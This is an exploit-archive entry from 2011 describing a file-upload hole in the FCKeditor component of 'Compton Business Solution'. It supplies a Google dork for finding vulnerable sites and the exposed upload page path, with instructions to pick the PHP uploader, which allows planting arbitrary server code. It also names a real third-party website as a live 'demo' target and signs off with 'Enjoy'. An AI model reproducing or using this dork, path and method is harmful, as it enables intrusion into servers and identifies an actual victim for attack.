id: 16534
date: 07/18/2011
title: Compton Business Solution (FCKeditor) File Upload Vulnerability
author: Angel Injection
cves: 

# Exploit Title:Compton Business Solution (FCKeditor) File Upload Vulnerability
# Date: 18/7/2011
# Author: Angel Injection
# home Page: http://www.club-h.co.cc
# Email: Angel-Injection[at]hotmail[Dot]com
# Vendor or Software Link:www.compton.in
# Version: N/A
# Category:: webapps
# Google dork: "Compton Business Solution"
# Tested on: Linux Back Track 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Exploit
http://server/administrator/FCKeditor/editor/filemanager/upload/test.html

Select the "File Uploader" to use: "php" ^_~

DEmo
http://starconinfra.in/administrator/FCKeditor/editor/filemanager/upload/test.html

Enjoy
-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Thanks to all the people of Iraq And Club Hack Team



#  0day.today [2023-03-26]  #